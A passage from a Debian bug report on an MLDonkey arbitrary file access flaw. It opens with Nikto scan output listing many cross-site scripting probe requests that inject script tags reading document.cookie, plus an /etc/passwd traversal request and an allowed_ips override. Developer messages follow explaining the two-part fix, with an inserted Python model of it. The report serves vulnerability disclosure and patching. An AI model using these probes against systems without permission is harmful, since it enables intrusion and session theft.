+ OSVDB-0: GET /gallery/search.php?searchstring=<script>alert(document.cookie)</script> : Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. BID-8288.
+ OSVDB-0: GET /friend.php?op=SiteSent&fname=<script>alert('Vulnerable')</script> : This version of PHP-Nuke's friend.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02.
+ OSVDB-0: GET /forum_members.asp?find=%22;}alert('Vulnerable');function%20x(){v%20=%22 : Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>alert('Vulnerable')</script> : YaBB is vulnerable to Cross Site Scripting (XSS) in the password field of the login page. CA-2000-02.
+ OSVDB-0: GET /error/500error.jsp?et=1<script>alert('Vulnerable')</script>; : Macromedia Sitespring 1.2.0(277.1) on Windows 2000 is vulnerable to Cross Site Scripting (XSS) in the error pages. CA-2000-02.
+ OSVDB-0: GET /download.php?sortby=&dcategory=<script>alert('Vulnerable')</script> : This version of PHP-Nuke's download.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02.
+ OSVDB-0: GET /comments.php?subject=<script>alert('Vulnerable')</script>&comment=<script>alert('Vulnerable')</script>&pid=0&sid=0&mode=&order=&thold=op=Preview : This version of PHP-Nuke's comments.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02.
+ OSVDB-0: GET /cleartrust/ct_logon.asp?CTLoginErrorMsg=<script>alert(1)</script> : RSA ClearTrust allows Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /cgi-local/cgiemail-1.6/cgicso?query=<script>alert('Vulnerable')</script> : This CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /cgi-local/cgiemail-1.4/cgicso?query=<script>alert('Vulnerable')</script> : This CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /calendar.php?year=<script>alert(document.cookie);</script>&month=03&day=05 : DCP-Portal v5.3.1 is vulnerable to  Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /ca000007.pl?ACTION=SHOWCART&REFPAGE=\"><script>alert('Vulnerable')</script> : Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /ca000001.pl?ACTION=SHOWCART&hop=\"><script>alert('Vulnerable')</script>&PATH=acatalog%2f : Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /bb000001.pl<script>alert('Vulnerable')</script> : Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /article.cfm?id=1'<script>alert(document.cookie);</script> : With malformed URLS, Coldfusion is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /apps/web/vs_diag.cgi?server=<script>alert('Vulnerable')</script> : Zeus 4.2r2 (webadmin-4.2r2) is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /addressbook/index.php?surname=<script>alert('Vulnerable')</script> : Phpgroupware 0.9.14.003 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /addressbook/index.php?name=<script>alert('Vulnerable')</script> : Phpgroupware 0.9.14.003 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /add.php3?url=ja&adurl=javascript:<script>alert('Vulnerable')</script> :  1.1 http://www.sugarfreenet.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /a?<script>alert('Vulnerable')</script> : Server is vulnerable to Cross Site Scripting (XSS) in the error message if code is passed in the query-string. This may be a Null HTTPd server.
+ OSVDB-0: GET /a.jsp/<script>alert('Vulnerable')</script> : JServ is vulnerable to Cross Site Scripting (XSS) when a non-existent JSP file is requested. Upgrade to the latest version of JServ. CA-2000-02.
+ OSVDB-0: GET /<script>alert('Vulnerable')</script>.thtml : Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /<script>alert('Vulnerable')</script>.shtml : Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /<script>alert('Vulnerable')</script>.jsp : Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /<script>alert('Vulnerable')</script>.aspx : Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). CA-2000-02.
+ OSVDB-0: GET /%0a%0a<script>alert(\"Vulnerable\")</script>.jsp : Jetty jsp servlet engine is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-3126: GET /submit?setoption=q&option=allowed_ips&value=255.255.255.255 : MLdonkey 2.x allows administrative interface access to be access from any IP. This is typically only found on port 4080.
+ OSVDB-6662: GET /<script>alert('Vulnerable')</script> : Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-9239: GET /mailman/admin/ml-name?\"><script>alert('Vulnerable')</script>; : Mailmain is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-16207: GET /mail/addressaction.html?id=<USERID#>&newaddress=1&addressname=<script>alert('Vulnerable')</script>&addressemail=junk@example.com : IceWarp Webmail 3.3.3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-25499: GET /affich.php?image=<script>alert(document.cookie)</script> : GPhotos index.php rep Variable XSS.
+ OSVDB-25498: GET /diapo.php?rep=<script>alert(document.cookie)</script> : GPhotos index.php rep Variable XSS.
+ OSVDB-700: GET /fcgi-bin/echo?foo=<script>alert('Vulnerable')</script> : Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-3954: GET /fcgi-bin/echo2?foo=<script>alert('Vulnerable')</script> : Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-700: GET /fcgi-bin/echo.exe?foo=<script>alert('Vulnerable')</script> : Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-3954: GET /fcgi-bin/echo2.exe?foo=<script>alert('Vulnerable')</script> : Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-14633: GET /ab2/Help_C/\@Ab2HelpSearch?scope=HELP&DwebQuery=<script>alert(Vulnerable)</script>  : Sun Answerbook is vulnerable to XSS in the search field.
+ OSVDB-19947: GET /apps/web/index.fcgi?servers=&section=<script>alert(document.cookie)</script> : Zeus Admin server 4.1r2 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-12607: GET /forgot_password.php?email=\"><script>alert(document.cookie)</script> : MySQL Eventum is vulnerable to XSS in the email field.
+ OSVDB-12606: GET /bugs/index.php?err=3&email=\"><script>alert(document.cookie)</script> : MySQL Eventum is vulnerable to XSS in the email field.
+ OSVDB-12607: GET /bugs/forgot_password.php?email=\"><script>alert(document.cookie)</script> : MySQL Eventum is vulnerable to XSS in the email field.
+ OSVDB-12606: GET /eventum/index.php?err=3&email=\"><script>alert(document.cookie)</script> : MySQL Eventum is vulnerable to XSS in the email field.
+ OSVDB-12607: GET /eventum/forgot_password.php?email=\"><script>alert(document.cookie)</script> : MySQL Eventum is vulnerable to XSS in the email field.
+ OSVDB-2562: GET /login/sm_login_screen.php?error=\"><script>alert('Vulnerable')</script> : SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-2562: GET /login/sm_login_screen.php?uid=\"><script>alert('Vulnerable')</script> : SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-2562: GET /SPHERA/login/sm_login_screen.php?error=\"><script>alert('Vulnerable')</script> : SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-2562: GET /SPHERA/login/sm_login_screen.php?uid=\"><script>alert('Vulnerable')</script> : SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-2617: GET /acart2_0/signin.asp?msg=<script>alert(\"test\")</script> : Alan Ward A-Cart 2.0 contains several XSS vulnerabilities
+ OSVDB-2921: GET /shopping/shopdisplayproducts.asp?id=1&cat=<script>alert('test')</script> : VP-ASP prior to 4.50 are vulnerable to XSS attacks
+ OSVDB-2921: GET shopdisplayproducts.asp?id=1&cat=<script>alert(document.cookie)</script> : VP-ASP SHopping Cart 4.x shopdisplayproducts.asp XSS.
+ OSVDB-3133: GET ////////../../../../../../etc/passwd : Xerox WorkCentre allows any file to be retrieved remotely.
+ OSVDB-3280: GET /forum/memberlist.php?s=23c37cf1af5d2ad05f49361b0407ad9e&what=\">\"<script>javascript:alert(document.cookie)</script> : Vbulletin 2.2.9 and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-3289: GET /firewall/policy/dlg?q=-1&fzone=t<script>alert('Vulnerable')</script>>&tzone=dmz : Fortigate firewall 2.50 and prior contains several CSS vulnerabilities in various administrative pages.
+ OSVDB-3294: GET /firewall/policy/policy?fzone=internal&tzone=dmz1<script>alert('Vulnerable')</script> : Fortigate firewall 2.50 and prior contains several CSS vulnerabilities in various administrative pages.
+ OSVDB-3295: GET /antispam/listdel?file=blacklist&name=b<script>alert('Vulnerable')</script>&startline=0 : Fortigate firewall 2.50 and prior contains several CSS vulnerabilities in various administrative pages.
+ OSVDB-3295: GET /antispam/listdel?file=whitelist&name=a<script>alert('Vulnerable')</script>&startline=0(naturally) : Fortigate firewall 2.50 and prior contains several CSS vulnerabilities in various administrative pages.
+ OSVDB-3296: GET /theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter\"><script>alert('Vulnerable')</script>,/system/status/session : Fortigate firewall 2.50 and prior contains several CSS vulnerabilities in various administrative pages.
+ OSVDB-3296: GET /theme1/selector?button=status,monitor,session&button_url=/system/status/status\"><script>alert('Vulnerable')</script>,/system/status/moniter,/system/status/session : Fortigate firewall 2.50 and prior contains several CSS vulnerabilities in various administrative pages.
+ OSVDB-3296: GET /theme1/selector?button=status,monitor,session\"><script>alert('Vulnerable')</script>&button_url=/system/status/status,/system/status/moniter,/system/status/session : Fortigate firewall 2.50 and prior contains several CSS vulnerabilities in various administrative pages.
+ OSVDB-3417: GET /examplesWebApp/InteractiveQuery.jsp?person=<script>alert('Vulnerable')</script> : BEA WebLogic 8.1 and below are vulnerable to Cross Site Scripting (XSS) in example code. CAN-2003-0624. CA-2000-02.
+ OSVDB-3458: GET /sgdynamo.exe?HTNAME=<script>alert('Vulnerable')</script> : Ecometry's SGDynamo is vulnerable to Cross Site Scripting (XSS). CAN-2002-0375. CA-2000-02.
+ OSVDB-3483: GET /docs/<script>alert('Vulnerable');</script> : Nokia Electronic Documentation is vulneable to Cross Site Scripting (XSS). CAN-2003-0801.
+ OSVDB-3486: GET /aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551089&desc=<script>alert('Vulnerable')</script> : Aktivate Shopping Cart 1.03 and lower are vulnerable to Cross Site Scripting (XSS). http://www.allen0keul.com/aktivate/ CAN-2001-1212, CA-2000-02.
+ OSVDB-3632: GET /webcalendar/colors.php?color=</script><script>alert(document.cookie)</script> : Webcalendar 0.9.42 and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-3633: GET /webcalendar/week.php?user=\"><script>alert(document.cookie)</script> : Webcalendar 0.9.42 and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-3762: GET /debug/dbg?host==<script>alert('Vulnerable');</script> : The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts. CA-2000-02.
+ OSVDB-3762: GET /debug/echo?name=<script>alert('Vulnerable');</script> : The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts. CA-2000-02.
+ OSVDB-3762: GET /debug/errorInfo?title===<script>alert('Vulnerable');</script> : The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts. CA-2000-02.
+ OSVDB-3762: GET /debug/showproc?proc===<script>alert('Vulnerable');</script> : The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts.
+ OSVDB-4262: GET /addressbook.php?\"><script>alert(Vulnerable)</script><!-- : Squirrel Mail 1.2.7 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-4265: GET /help.php?chapter=<script>alert('Vulnerable')</script> : Squirrel Mail 1.2.7 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-4356: GET /acart2_0/deliver.asp?msg=<script>alert(\"test\")</script> : Alan Ward A-Cart 2.0 contains several XSS vulnerabilities
+ OSVDB-4357: GET /acart2_0/error.asp?msg=<script>alert(\"test\")</script> : Alan Ward A-Cart 2.0 contains several XSS vulnerabilities
+ OSVDB-4358: GET /acart2_0/admin/error.asp?msg=<script>alert(\"test\")</script> : Alan Ward A-Cart 2.0 contains several XSS vulnerabilities
+ OSVDB-4359: GET /acart2_0/admin/index.asp?msg=<script>alert(\"test\")</script> : Alan Ward A-Cart 2.0 contains several XSS vulnerabilities
+ OSVDB-5097: GET /wwwping/index.stm?wwwsite=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5098: GET /sysuser/docmgr/create.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5098: GET /sysuser/docmgr/edit.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5098: GET /sysuser/docmgr/ftp.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5098: GET /sysuser/docmgr/htaccess.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5098: GET /sysuser/docmgr/iecreate.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5098: GET /sysuser/docmgr/ieedit.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5098: GET /sysuser/docmgr/info.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5098: GET /sysuser/docmgr/mkdir.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5098: GET /sysuser/docmgr/rename.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5098: GET /sysuser/docmgr/search.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5098: GET /sysuser/docmgr/sendmail.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5098: GET /sysuser/docmgr/template.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5098: GET /sysuser/docmgr/update.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5098: GET /sysuser/docmgr/vccheckin.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5098: GET /sysuser/docmgr/vccreate.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5098: GET /sysuser/docmgr/vchist.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5099: GET /sysuser/docmgr/edit.stm?name=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5099: GET /sysuser/docmgr/ieedit.stm?name=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5099: GET /sysuser/docmgr/info.stm?name=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5099: GET /sysuser/docmgr/rename.stm?name=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5099: GET /sysuser/docmgr/sendmail.stm?name=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5099: GET /sysuser/docmgr/update.stm?name=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5099: GET /sysuser/docmgr/vccheckin.stm?name=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5099: GET /sysuser/docmgr/vccreate.stm?name=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5099: GET /sysuser/docmgr/vchist.stm?name=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5102: GET /syshelp/stmex.stm?foo=123&bar=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5102: GET /syshelp/stmex.stm?foo=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5103: GET /syshelp/cscript/showfunc.stm?func=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5104: GET /syshelp/cscript/showfncs.stm?pkg=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5105: GET /syshelp/cscript/showfnc.stm?pkg=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5106: GET /netutils/ipdata.stm?ipaddr=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5107: GET /netutils/findata.stm?host=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5107: GET /netutils/findata.stm?user=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5108: GET /sysuser/docmgr/search.stm?query=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5457: GET /webtools/bonsai/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD : Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5458: GET /webtools/bonsai/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5458: GET /webtools/bonsai/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week : Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5459: GET /webtools/bonsai/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5459: GET /webtools/bonsai/cvslog.cgi?file=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5460: GET /webtools/bonsai/cvsblame.cgi?file=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5461: GET /webtools/bonsai/showcheckins.cgi?person=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-6659: GET /seeV0KoysiqHYvXK8q1zswJYGYkZuORRlCEbA28kntfzVd21ItEmBXl8ftdF9DMYZ1QB51QHlC9F5Auo0zk6S5ezAZwsBkrCl4k8DWbAFarJrQTv83I03Jl89XOy39MYKNPHKX6dxMP4JGj6l9wK5yekrcfn7zmNEnfxpgXh9QXG9TqpdTEyOqGtrcMq0FuM8sVYYSza3vNXxFcCYN0KTDLZw5iTny5<font%20size=50><script>alert('Vulnerable')</script><!--//-- : MyWebServer 1.0.2 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-701: GET /pls/dadname/htp.print?cbuf=<script>alert('Vulnerable')</script> : Oracle 9iAS is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-701: GET /pls/help/<script>alert('Vulnerable')</script> : Oracle 9iAS is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-20406: GET /phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script> : PHP contains a flaw that allows a remote cross site scripting attack.
+ OSVDB-24484: GET /phpinfo.php?cx[]=[long random padding string removed]<script>alert(foo)</script> : PHP 5.1.2 and 4.4.2 phpinfo() Function Long Array XSS
+ 2967 items checked: 233 item(s) reported on remote host
+ End Time:        2009-03-11 4:27:04 (38 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Information forwarded to debian-bugs-dist@lists.debian.org, Debian OCaml Maintainers <debian-ocaml-maint@lists.debian.org>:
Bug#516829; Package mldonkey-server. (Tue, 10 Mar 2009 21:36:06 GMT) Full text and rfc822 format available.

Acknowledgement sent to Spiral Voice <spiralvoice@web.de>:
Extra info received and forwarded to list. Copy sent to Debian OCaml Maintainers <debian-ocaml-maint@lists.debian.org>. (Tue, 10 Mar 2009 21:36:06 GMT) Full text and rfc822 format available.

Message #24 received at 516829@bugs.debian.org (full text, mbox):

From: Spiral Voice <spiralvoice@web.de>
To: 516829@bugs.debian.org
Subject: Re: Http double slash request arbitrary file access vulnerability
Date: Tue, 10 Mar 2009 22:34:23 +0100
Hi,

here is a copy of an email I wrote today:

Mehdi Dogguy wrote:
> > Hello,
> > 
> > I'm trying to understand why the submitted patch is enough to fix the
> > issue. More particularly, how /../ are removed from the url?
> > 
> > Cheers,
> > 

Hi,

the fix for MLDonkey consists of two parts, first this patch which
removes leading slashes from the path/filename-part of a URL:

http://cvs.savannah.gnu.org/viewvc/mldonkey/src/utils/lib/url.ml?root=mldonkey&r1=1.9&r2=1.10

This fixes http://mldonkey:4080//etc/passwd style attacks.

This was not enough however to fix the problem so I added this patch:

http://cvs.savannah.gnu.org/viewvc/mldonkey/src/daemon/driver/driverControlers.ml?root=mldonkey&r1=1.113&r2=1.114

The old code worked like this:

If the file requested is not an MLDonkey command or an otherwise
internally defined file this code was called:

| s ->  http_send_bin r buf (String.lowercase s)

The function http_send_bin was extended in MLDonkey 2.8.4 to
check the internal commonPictures database, which contains country
flags. If a file was not found there, File.to_string was called, which
reads files from the local filesystem -> bad idea.

So, the problem was created when country flags were added to
MLDonkey.

I changed the code shown above to 

| s -> http_send_bin_pictures r buf (String.lowercase s)

http_send_bin_pictures is basically the same function as
http_send_bin, but it only checks the commonPictures database
and does not read any files from the local disc -> problem solved.

Cheers, spiralvoice


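The two-part fix described in the message above, modelled as an added Python example (not MLDonkey's OCaml source and not part of the original message): it compares the original dispatcher, the slash-stripping patch alone, and the picture-table-only handler on the same three requests. `PICTURES`, `url_to_name`, `read_local_file` and `workdir` are hypothetical names, the unpatched parser is assumed to drop exactly one leading slash, the `String.lowercase` step is omitted, and the `/../` request is taken from the question quoted in the message.

```python
import os
import tempfile

# Stand-in for the commonPictures database (constructed sample entry).
PICTURES = {"flag_de.png": b"constructed-png-bytes"}


def strip_leading_slashes(path):
    """First patch, modelled: drop every leading '/' from the URL path."""
    return path.lstrip("/")


def url_to_name(path, patched):
    """Turn a request path into the name handed to the dispatcher.

    Assumption: the unpatched parser removed exactly one leading slash, so a
    double-slash request still arrived as an absolute file name.
    """
    if patched:
        return strip_leading_slashes(path)
    if path.startswith("/"):
        return path[1:]
    return path


def read_local_file(workdir, name):
    """Stand-in for File.to_string, for a process whose cwd is workdir."""
    # os.path.join discards workdir when name is absolute, which is how
    # open() treats an absolute name regardless of the working directory.
    try:
        with open(os.path.join(workdir, name), "rb") as fh:
            return fh.read()
    except OSError:
        return None


def http_send_bin(workdir, name):
    """Old behaviour: picture table first, then fall back to the filesystem."""
    if name in PICTURES:
        return PICTURES[name]
    return read_local_file(workdir, name)


def http_send_bin_pictures(workdir, name):
    """Fixed behaviour: the picture table is the only source of data."""
    return PICTURES.get(name)


def run_demo():
    """Return {(stage, request_label): bytes served, or None for 'not found'}."""
    results = {}
    with tempfile.TemporaryDirectory(prefix="mld_demo_") as root:
        workdir = os.path.join(root, "daemon")      # models the daemon's cwd
        os.mkdir(workdir)
        secret = os.path.join(root, "secret.txt")   # constructed file outside workdir
        with open(secret, "wb") as fh:
            fh.write(b"constructed secret")

        requests = {
            "picture": "/flag_de.png",
            "double-slash": "/" + secret,           # e.g. //tmp/.../secret.txt
            "dot-dot": "/../secret.txt",
        }
        stages = {
            "original": (False, http_send_bin),
            "strip-only": (True, http_send_bin),
            "strip+pictures-only": (True, http_send_bin_pictures),
        }
        for stage, (patched, handler) in stages.items():
            for label, path in requests.items():
                name = url_to_name(path, patched)
                results[(stage, label)] = handler(workdir, name)
    return results


if __name__ == "__main__":
    for (stage, label), served in sorted(run_demo().items()):
        print(f"{stage:20} {label:13} -> {served!r}")
```

In this model the slash-stripping step alone stops the double-slash request but not the relative one, while the handler without a filesystem fallback returns nothing for either, whatever the path normalisation does.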
Information forwarded to debian-bugs-dist@lists.debian.org, Debian OCaml Maintainers <debian-ocaml-maint@lists.debian.org>:
Bug#516829; Package mldonkey-server. (Tue, 10 Mar 2009 21:42:06 GMT) Full text and rfc822 format available.

Acknowledgement sent to Spiral Voice <spiralvoice@web.de>:
Extra info received and forwarded to list. Copy sent to Debian OCaml Maintainers <debian-ocaml-maint@lists.debian.org>. (Tue, 10 Mar 2009 21:42:06 GMT) Full text and rfc822 format available.

Message #29 received at 516829@bugs.debian.org (full text, mbox):

From: Spiral Voice <spiralvoice@web.de>
To: 516829@bugs.debian.org
Subject: Re: Http double slash request arbitrary file access vulnerability
Date: Tue, 10 Mar 2009 22:37:20 +0100
Hi,

this scan was done against MLDonkey 3.0.0:

---------------------------------------------------------------------------
- Nikto 2.02/2.03     -     cirt.net
+ Target IP:       192.168.1.8
+ Target Hostname: router
+ Target Port:     4080
+ Start Time:      2009-03-11 22:33:08
---------------------------------------------------------------------------
+ Server: No banner retrieved
- Successfully authenticated to realm "MLdonkey".
+ OSVDB-3126: GET /submit?setoption=q&option=allowed_ips&value=255.255.255.255 : MLdonkey 2.x allows administrative interface access to be access from any IP. This is typically only found on port 4080.
+ 2967 items checked: 1 item(s) reported on remote host
+ End Time:        2009-03-11 22:35:23 (135 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

The message about allowed_ips can be ignored, default is 127.0.0.1.

Cheers, spiralvoice


Information forwarded to debian-bugs-dist@lists.debian.org, Debian OCaml Maintainers <debian-ocaml-maint@lists.debian.org>:
Bug#516829; Package mldonkey-server. (Mon, 16 Mar 2009 13:21:04 GMT) Full text and rfc822 format available.

Acknowledgement sent to Nico Golde <nion@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian OCaml Maintainers <debian-ocaml-maint@lists.debian.org>. (Mon, 16 Mar 2009 13:21:04 GMT) Full text and rfc822 format available.

Message #34 received at 516829@bugs.debian.org (full text, mbox):

From: Nico Golde <nion@debian.org>
To: 516829@bugs.debian.org
Subject: Re: Http double slash request arbitrary file access vulnerability
Date: Mon, 16 Mar 2009 14:18:42 +0100
Hi,
this bug was marked as pending on February 24th. What is 
missing for the upload? Do you need an NMU?

Cheers
Nico

-- 
Nico Golde - http://www.ngolde.de - nion@jabber.ccc.de - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.

Information forwarded to debian-bugs-dist@lists.debian.org, Debian OCaml Maintainers <debian-ocaml-maint@lists.debian.org>:
Bug#516829; Package mldonkey-server. (Mon, 16 Mar 2009 13:45:03 GMT) Full text and rfc822 format available.

Acknowledgement sent to Mehdi Dogguy <mehdi.dogguy@pps.jussieu.fr>:
Extra info received and forwarded to list. Copy sent to Debian OCaml Maintainers <debian-ocaml-maint@lists.debian.org>. (Mon, 16 Mar 2009 13:45:03 GMT) Full text and rfc822 format available.

Message #39 received at 516829@bugs.debian.org (full text, mbox):

From: Mehdi Dogguy <mehdi.dogguy@pps.jussieu.fr>
To: Nico Golde <nion@debian.org>, 516829@bugs.debian.org
Subject: Re: Bug#516829: Http double slash request arbitrary file access vulnerability
